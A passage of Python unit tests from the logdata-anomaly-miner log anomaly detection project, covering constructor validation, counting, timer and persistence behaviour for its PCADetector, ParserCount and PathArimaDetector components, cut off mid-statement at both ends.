["/value"], [self.stream_printer_event_handler], 10, 2, b"Default", 3) self.assertRaises(TypeError, PCADetector, 
self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, "123", 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, {"id": "Default"}, 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, ["Default"], 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, [], 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, (), 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, set(), 3) PCADetector(self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0, 3) PCADetector(self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.5, 3) PCADetector(self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 1, 3) self.assertRaises(ValueError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, -1) self.assertRaises(ValueError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 0) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, b"Default") self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, "123") self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, {"id": "Default"}) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, ["Default"]) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, []) self.assertRaises(TypeError, PCADetector, 
self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, ()) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, set()) PCADetector(self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 100) self.assertRaises(ValueError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, persistence_id="") self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, persistence_id=None) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, persistence_id=b"Default") self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, persistence_id=True) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, persistence_id=123) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, persistence_id=123.22) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, persistence_id={"id": "Default"}) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, persistence_id=["Default"]) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, persistence_id=[]) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, persistence_id=()) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, persistence_id=set()) PCADetector(self.aminer_config, ["/value"], 
[self.stream_printer_event_handler], 10, 2, 0.9, 3, persistence_id="Default") self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=b"True") self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode="True") self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=123) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=123.22) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode={"id": "Default"}) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=["Default"]) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=[]) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=()) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=set()) PCADetector(self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=True) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, output_logline=None) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, output_logline=b"True") self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, output_logline="True") self.assertRaises(TypeError, PCADetector, 
self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, output_logline=123) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, output_logline=123.22) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, output_logline={"id": "Default"}) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, output_logline=["Default"]) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, output_logline=[]) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, output_logline=()) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, output_logline=set()) PCADetector(self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, output_logline=True) self.assertRaises(ValueError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, ignore_list=[""]) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, ignore_list="") self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, ignore_list=b"Default") self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, ignore_list=True) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, ignore_list=123) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, ignore_list=123.3) 
self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, ignore_list={"id": "Default"}) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, ignore_list=()) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, ignore_list=set()) PCADetector(self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, ignore_list=[]) PCADetector(self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, ignore_list=None) self.assertRaises(ValueError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, constraint_list=[""]) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, constraint_list="") self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, constraint_list=b"Default") self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, constraint_list=True) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, constraint_list=123) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, constraint_list=123.3) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, constraint_list={"id": "Default"}) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, constraint_list=()) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, 
constraint_list=set()) PCADetector(self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, constraint_list=[]) PCADetector(self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, constraint_list=None) self.assertRaises(ValueError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=True, stop_learning_time=-1) self.assertRaises(ValueError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=True, stop_learning_time=0) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=True, stop_learning_time=b"Default") self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=True, stop_learning_time="123") self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=True, stop_learning_time={"id": "Default"}) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=True, stop_learning_time=["Default"]) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=True, stop_learning_time=[]) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=True, stop_learning_time=()) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=True, stop_learning_time=set()) PCADetector(self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=True, stop_learning_time=100) PCADetector(self.aminer_config, ["/value"], 
[self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=True, stop_learning_time=100.22) self.assertRaises(ValueError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=True, stop_learning_no_anomaly_time=-1) self.assertRaises(ValueError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=True, stop_learning_no_anomaly_time=0) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=True, stop_learning_no_anomaly_time=b"Default") self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=True, stop_learning_no_anomaly_time="123") self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=True, stop_learning_no_anomaly_time={"id": "Default"}) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=True, stop_learning_no_anomaly_time=["Default"]) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=True, stop_learning_no_anomaly_time=[]) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=True, stop_learning_no_anomaly_time=()) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=True, stop_learning_no_anomaly_time=set()) PCADetector(self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=True, stop_learning_no_anomaly_time=100) PCADetector(self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=True, 
stop_learning_no_anomaly_time=100.22) self.assertRaises(ValueError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=True, stop_learning_time=100, stop_learning_no_anomaly_time=100) self.assertRaises(ValueError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, log_resource_ignore_list=["/tmp/syslog"]) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, log_resource_ignore_list="") self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, log_resource_ignore_list=b"Default") self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, log_resource_ignore_list=True) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, log_resource_ignore_list=123) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, log_resource_ignore_list=123.22) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, log_resource_ignore_list={"id": "Default"}) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, log_resource_ignore_list=()) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, log_resource_ignore_list=set()) PCADetector(self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, log_resource_ignore_list=["file:///tmp/syslog"]) if __name__ == "__main__": unittest.main() 
logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/analysis/ParserCountTest.py000066400000000000000000000345111500476301700272660ustar00rootroot00000000000000
from aminer.analysis.ParserCount import ParserCount, current_processed_lines_str, total_processed_lines_str
from aminer.input.LogAtom import LogAtom
from aminer.parsing.ParserMatch import ParserMatch
from unit.TestBase import TestBase, DummyFixedDataModelElement, DummyMatchContext, DummyFirstMatchModelElement, DummySequenceModelElement
import time


class ParserCountTest(TestBase):
    """Unittests for the ParserCount analysis component."""

    def test1receive_atom(self):
        """
        Check that receive_atom increments the per-path counters for every configured path the atom matches.

        Four cases are exercised: an atom matching none of the configured paths, one matching a single path,
        one matching several paths, and the default configuration without a target path list.
        """
        m1_context = DummyMatchContext(b"First string")
        m2_context = DummyMatchContext(b" to match.")
        m3_context = DummyMatchContext(b"some completely other string to match.")
        seq_context = DummyMatchContext(b"First string to match.")
        m1_element = DummyFixedDataModelElement("m1", b"First string")
        m2_element = DummyFixedDataModelElement("m2", b" to match.")
        seq_element = DummySequenceModelElement("seq", [m1_element, m2_element])
        m3_element = DummyFixedDataModelElement("m3", b"some completely other string to match.")
        # The m1/m2 matches are produced for parity with the other elements; only the m3 and seq matches are fed to the counter.
        m1_element.get_match_element("fixed", m1_context)
        m2_element.get_match_element("fixed", m2_context)
        m3_match = m3_element.get_match_element("fixed", m3_context)
        seq_match = seq_element.get_match_element("fixed", seq_context)

        def make_counter(target_paths):
            return ParserCount(self.aminer_config, target_paths, [self.stream_printer_event_handler])

        # Case 1: the atom's path (fixed/m3) is not among the configured paths, so the counters must not change.
        counter = make_counter(["fixed/seq", "fixed/seq/m1", "fixed/seq/m2"])
        now = time.time()
        atom = LogAtom(m3_element.data, ParserMatch(m3_match), now, counter)
        expected = dict(counter.count_dict)
        counter.receive_atom(atom)
        self.assertEqual(counter.count_dict, expected)

        # Case 2: exactly one configured path matches. The atom from case 1 is reused (it still names the previous counter as source).
        counter = make_counter(["fixed/seq", "fixed/seq/m1", "fixed/seq/m2", "fixed/m3"])
        expected = dict(counter.count_dict)
        # NOTE(review): dict() is a shallow copy. If ParserCount updates the inner per-path dicts in place, expected and
        # counter.count_dict share them and this comparison cannot fail; copy.deepcopy would make the check meaningful.
        expected["fixed/m3"][current_processed_lines_str] = 1
        expected["fixed/m3"][total_processed_lines_str] = 1
        counter.receive_atom(atom)
        self.assertEqual(counter.count_dict, expected)

        # Case 3: the sequence atom matches fixed/seq and both of its children.
        counter = make_counter(["fixed/seq", "fixed/seq/m1", "fixed/seq/m2", "fixed/m3"])
        atom = LogAtom(seq_match.match_string, ParserMatch(seq_match), now, counter)
        expected = dict(counter.count_dict)
        for path in ("fixed/seq", "fixed/seq/m1", "fixed/seq/m2"):
            expected[path][current_processed_lines_str] = 1
            expected[path][total_processed_lines_str] = 1
        counter.receive_atom(atom)
        self.assertEqual(counter.count_dict, expected)

        # Case 4: no target_path_list. The test expects only the top-level match path to be counted.
        counter = make_counter(None)
        now = time.time()
        atom = LogAtom(seq_match.match_string, ParserMatch(seq_match), now, counter)
        expected = dict(counter.count_dict)
        expected["fixed/seq"] = {current_processed_lines_str: 1, total_processed_lines_str: 1}
        counter.receive_atom(atom)
        self.assertEqual(counter.count_dict, expected)

    def test2do_timer(self):
        """
        Check the countdown returned by do_timer around a pending report.

        With next_report_time set 40 s ahead, a call 20 s in returns the remaining 20 s; a call at the deadline triggers the
        report and returns the full report_interval. The assertions at t + 99 (1 s left) and t + 100 imply the next deadline is
        t + 100, i.e. presumably a default report_interval of 60 s.
        """
        counter = ParserCount(self.aminer_config, ["fixed/seq", "fixed/seq/m1", "fixed/seq/m2"], [self.stream_printer_event_handler])
        start = time.time()
        counter.next_report_time = start + 40
        # None stands for "the counter's report_interval", read after do_timer ran, as in the original assertions.
        for offset, remaining in ((20, 20), (40, None), (99, 1), (100, None)):
            actual = counter.do_timer(start + offset)
            self.assertEqual(actual, counter.report_interval if remaining is None else remaining)

    def test3send_report_resetting(self):
        """
        Check how send_report treats the current-interval counters.

        The test expects the first send_report call to leave every counter untouched and the second call to reset the
        current_processed_lines counters to zero while the total_processed_lines counters are kept.
        """
        counter = ParserCount(self.aminer_config, ["fixed/seq", "fixed/seq/m1", "fixed/seq/m2", "fixed/m3"], [self.stream_printer_event_handler], 600)
        seeded = {"fixed/seq": 5, "fixed/seq/m1": 5, "fixed/seq/m2": 5, "fixed/m3": 17}
        for path, count in seeded.items():
            counter.count_dict[path][current_processed_lines_str] = count
            counter.count_dict[path][total_processed_lines_str] = count
        # NOTE(review): shallow copy; if the inner dicts are mutated in place by send_report, both comparisons below are tautological.
        expected = dict(counter.count_dict)
        counter.send_report()
        self.assertEqual(counter.count_dict, expected)
        counter.send_report()
        for path in seeded:
            expected[path][current_processed_lines_str] = 0
        self.assertEqual(counter.count_dict, expected)

    def test4validate_parameters(self):
        """
        Check the constructor's argument validation.

        Wrong types must raise TypeError; structurally invalid values (empty path strings, label lists whose length does not
        match the path list, resource names that are not URLs) must raise ValueError; the accepted value closing each group
        must construct without error.
        """
        def build(target_paths, event_handlers, **kwargs):
            return ParserCount(self.aminer_config, target_paths, event_handlers, **kwargs)

        def handlers():
            # A fresh list per call, mirroring the original one-literal-per-assertion style.
            return [self.stream_printer_event_handler]

        for bad_handlers in (["default"], None, "", b"Default", True, 123, 123.3, {"id": "Default"}, (), set()):
            self.assertRaises(TypeError, build, ["fixed/seq"], bad_handlers)

        self.assertRaises(ValueError, build, [""], handlers())
        for bad_paths in ("", b"Default", True, 123, 123.22, {"id": "Default"}, (), set()):
            self.assertRaises(TypeError, build, bad_paths, handlers())

        for bad_interval in ("", None, b"Default", True, {"id": "Default"}, ["Default"], [], (), set(), 123.22):
            self.assertRaises(TypeError, build, ["fixed/seq"], handlers(), report_interval=bad_interval)
        build(["fixed/seq"], handlers(), report_interval=123)

        # target_label_list: empty, or of a different length than target_path_list, is rejected as ValueError.
        self.assertRaises(ValueError, build, ["fixed/seq"], handlers(), target_label_list=[])
        self.assertRaises(ValueError, build, None, handlers(), target_label_list=["p"])
        self.assertRaises(ValueError, build, ["path1", "path2"], handlers(), target_label_list=["p"])
        self.assertRaises(ValueError, build, ["path1"], handlers(), target_label_list=["p1", "p2"])
        for bad_labels in ("", b"Default", True, {"id": "Default"}, 123, 123.22, (), set()):
            self.assertRaises(TypeError, build, ["fixed/seq"], handlers(), target_label_list=bad_labels)
        build(["fixed/seq"], handlers(), target_label_list=["p"])

        for bad_flag in ("", None, b"Default", 123, 123.22, {"id": "Default"}, ["Default"], [], (), set()):
            self.assertRaises(TypeError, build, ["fixed/seq"], handlers(), split_reports_flag=bad_flag)
        build(["fixed/seq"], handlers(), split_reports_flag=True)

        self.assertRaises(ValueError, build, ["fixed/seq"], handlers(), log_resource_ignore_list=["/tmp/syslog"])
        for bad_resources in ("", b"Default", True, 123, 123.22, {"id": "Default"}, (), set()):
            self.assertRaises(TypeError, build, ["fixed/seq"], handlers(), log_resource_ignore_list=bad_resources)
        build(["fixed/seq"], handlers(), log_resource_ignore_list=["file:///tmp/syslog"])
logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/analysis/PathArimaDetectorTest.py000066400000000000000000001016011500476301700303540ustar00rootroot00000000000000
import unittest
import time
from datetime import datetime
from aminer.analysis.PathArimaDetector import PathArimaDetector
from aminer.analysis.EventTypeDetector import EventTypeDetector
from aminer.input.LogAtom import LogAtom
from aminer.parsing.MatchElement import MatchElement
from aminer.parsing.ParserMatch import ParserMatch
from unit.TestBase import TestBase, DummyFixedDataModelElement, DummyFirstMatchModelElement, DummyMatchContext
from aminer.AminerConfig import DEFAULT_PERSISTENCE_PERIOD
from aminer.analysis.EventCorrelationDetector import EventCorrelationDetector, set_random_seed
import random


class PathArimaDetectorTest(TestBase):
    """Unittests for the PathArimaDetector."""

    def test1receive_atom(self):
        """
        Check that log atoms are processed and that learning is switched off by the configured stop conditions.

        The detector is first driven through run_pad_test (defined elsewhere in this module) with and without a
        target_path_list. Afterwards stop_learning_time and stop_learning_no_anomaly_time are checked by feeding atoms
        with increasing atom_time values and observing when learn_mode flips to False.
"""
        type_detector = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler])
        detector = PathArimaDetector(self.aminer_config, [self.stream_printer_event_handler], type_detector, learn_mode=True, output_logline=False)
        # run_pad_test and self.data are provided elsewhere in this test module.
        self.run_pad_test(detector, type_detector, self.data)

        # Same run, but both detectors restricted to a single target path.
        type_detector = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler], target_path_list=["/model/value"])
        detector = PathArimaDetector(self.aminer_config, [self.stream_printer_event_handler], type_detector, target_path_list=["/model/value"], learn_mode=True, output_logline=False)
        self.run_pad_test(detector, type_detector, self.data)

        # stop_learning_time: learning must still be on at start + 99 and off once an atom at start + 101 arrives.
        start = time.time()

        def make_atom(value):
            return LogAtom(value, ParserMatch(MatchElement("/value", value, value, None)), start, None)

        atom_a = make_atom(b"a")
        atom_b = make_atom(b"b")
        atom_a2 = make_atom(b"a")
        detector = PathArimaDetector(self.aminer_config, [self.stream_printer_event_handler], type_detector, target_path_list=["/model/value"], learn_mode=True, stop_learning_time=100)
        self.assertTrue(detector.receive_atom(atom_a))
        atom_a.atom_time = start + 99
        self.assertTrue(detector.receive_atom(atom_a))
        self.assertTrue(detector.learn_mode)
        atom_a.atom_time = start + 101
        self.assertTrue(detector.receive_atom(atom_a))
        self.assertFalse(detector.learn_mode)

        # stop_learning_no_anomaly_time: learning ends after 100 s without an anomaly.
        detector = PathArimaDetector(self.aminer_config, [self.stream_printer_event_handler], type_detector, target_path_list=["/model/value"], learn_mode=True, stop_learning_no_anomaly_time=100)
        atom_a.atom_time = start
        self.assertTrue(detector.receive_atom(atom_a))
        atom_a.atom_time = start + 100
        self.assertTrue(detector.receive_atom(atom_a))
        self.assertTrue(detector.learn_mode)
        atom_b.atom_time = start + 100
        self.assertTrue(detector.receive_atom(atom_b))
        self.assertTrue(detector.learn_mode)
        # NOTE(review): atom_a's time is advanced here, but atom_a2 (still stamped with start) is the atom delivered.
        # This looks like it was meant to be atom_a2.atom_time = start + 200; kept as-is to preserve the test's behaviour.
        atom_a.atom_time = start + 200
        self.assertTrue(detector.receive_atom(atom_a2))
        self.assertTrue(detector.learn_mode)
        atom_a.atom_time = start + 201
        self.assertTrue(detector.receive_atom(atom_a))
        self.assertFalse(detector.learn_mode)

    def test2do_timer(self):
        """
        Check the countdown returned by do_timer around a pending persistence.

        next_persist_time is set 400 s ahead: 200 s in, 200 s remain; at the deadline DEFAULT_PERSISTENCE_PERIOD is
        returned. The assertions at start + 999 (1 s left) and start + 1000 imply the following deadline is start + 1000.
        """
        type_detector = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler])
        detector = PathArimaDetector(self.aminer_config, [self.stream_printer_event_handler], type_detector)
        start = time.time()
        detector.next_persist_time = start + 400
        for offset, remaining in ((200, 200), (400, DEFAULT_PERSISTENCE_PERIOD), (999, 1), (1000, DEFAULT_PERSISTENCE_PERIOD)):
            self.assertEqual(detector.do_timer(start + offset), remaining)

    def test3persistence(self):
        """
        Check that do_persist and load_persistence_data round-trip the detector's learned state.

        After run_pad_test the persisted file content is expected to be '[[[], null], [[], null], [[]]]'; the in-memory
        lists are cleared and reloaded, and a second detector constructed without an explicit persistence_id must come up
        with the same state.
        """
        type_detector = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler])
        detector = PathArimaDetector(self.aminer_config, [self.stream_printer_event_handler], type_detector, learn_mode=True, output_logline=False)
        self.run_pad_test(detector, type_detector, self.data)
        detector.do_persist()
        with open(detector.persistence_file_name, "r") as persisted:
            self.assertEqual(persisted.read(), '[[[], null], [[], null], [[]]]')

        def assert_learned_state(subject):
            self.assertEqual(subject.target_path_index_list, [[], None])
            self.assertEqual(subject.period_length_list, [[], None])
            self.assertEqual(subject.prediction_history, [[]])

        assert_learned_state(detector)
        detector.target_path_index_list = []
        detector.period_length_list = []
        detector.prediction_history = []
        detector.load_persistence_data()
        assert_learned_state(detector)

        other = PathArimaDetector(self.aminer_config, [self.stream_printer_event_handler], type_detector, learn_mode=True)
        self.assertEqual(other.target_path_index_list, detector.target_path_index_list)
        self.assertEqual(other.period_length_list, detector.period_length_list)
        self.assertEqual(other.prediction_history, detector.prediction_history)

    def test4validate_parameters(self):
        """Test all initialization parameters for the detector.
Input parameters must be validated in the class.""" etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler], save_values=False) self.assertRaises(ValueError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd) etd.save_values = True old_val = etd.min_num_vals etd.min_num_vals = 10 self.assertRaises(ValueError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd) etd.min_num_vals = old_val old_val = etd.max_num_vals etd.max_num_vals = 10 self.assertRaises(ValueError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd) etd.max_num_vals = old_val self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, ["default"], etd) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, None, etd) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, "", etd) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, b"Default", etd) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, True, etd) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, 123, etd) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, 123.3, etd) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, {"id": "Default"}, etd) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, (), etd) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, set(), etd) self.assertRaises(ValueError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id="") self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id=None) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id=b"Default") self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, 
